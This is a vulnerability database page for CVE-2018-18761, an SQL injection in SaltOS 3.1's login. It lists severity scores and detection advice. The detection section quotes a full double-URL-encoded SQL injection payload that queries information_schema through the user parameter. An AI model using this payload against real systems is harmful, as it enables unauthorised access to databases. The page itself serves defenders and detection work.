cbcvebase.
CVE-2018-18761
published 2018-11-16

CVE-2018-18761: SaltOS 3.1 r8126 allows action=login&querystring=&user=[SQL] SQL Injection.

PriorityP268critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
16.46%
96.6th percentile
SaltOS 3.1 r8126 allows action=login&querystring=&user=[SQL] SQL Injection.

Affected

1 ranges
VendorProductVersion rangeFixed in
saltossaltos

Detection & IOCsextracted from sources · hover to see the quote

url/index.php
commandaction=login&querystring=&user=[SQL]
commandaction=login&querystring=&user=%2531%2527%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%2575%256e%2574%2528%252a%2529%252c%2563%256f%256e%2563%2561%2574%2528%2528%2573%2565%256c%2565%2563%2574%2528%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%2528%2563%2561%2573%2574%2528%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%2561%2573%2520%2563%2568%2561%2572%2529%252c%2530%2578%2537%2565%2529%2529%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2577%2568%2565%2572%2565%2520%2574%2561%2562%256c%2565%255f%2573%2563%2568%2565%256d%2561%253d%2564%2561%2574%2561%2562%2561%2573%2565%2528%2529%2520%256c%2569%256d%2569%2574%2520%2530%252c%2531%2529%252c%2566%256c%256f%256f%2572%2528%2572%2561%256e%2564%2528%2530%2529%252a%2532%2529%2529%2578%2520%2566%2572%256f%256d%2520%2569%256e%2566%256f%2572%256d%2561%2574%2569%256f%256e%255f%2573%2563%2568%2565%256d%2561%252e%2574%2561%2562%256c%2565%2573%2520%2567%2572%256f%2575%2570%2520%2562%2579%2520%2578%2529%2561%2529%2520%2541%254e%2544%2520%2527%2545%2566%2565%2527%253d%2527%2545%2566%2565&pass=x&lang=en_US&style=blue&iconset=silk
  • Detect SQL injection attempts against SaltOS login endpoint: monitor POST requests to /index.php with body parameters action=login and a user field containing double-URL-encoded SQL payloads (e.g., %25 sequences).
  • The exploit uses double URL-encoding (e.g., %25 prefix) to bypass input filters; detection rules should decode at least two layers of percent-encoding before inspecting the user parameter for SQL keywords such as SELECT, FROM, WHERE, CONCAT, FLOOR, RAND.
  • The attack is delivered as a POST request with Content-Type: application/x-www-form-urlencoded and X-Requested-With: XMLHttpRequest header; alert on this combination targeting /index.php with action=login.
  • The SQL injection payload leverages an error-based/UNION technique querying information_schema.tables; monitor for the string 'information_schema' appearing (after decoding) in the user POST parameter.
  • ·The exploit targets a specific version; the PATH component in the URL is variable and must be adjusted to match the actual deployment path of SaltOS on the target server.
  • ·The vulnerable version is SaltOS 3.1 r8126; the exploit author notes it may also affect 3.x broadly, so detection should not be scoped only to r8126.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.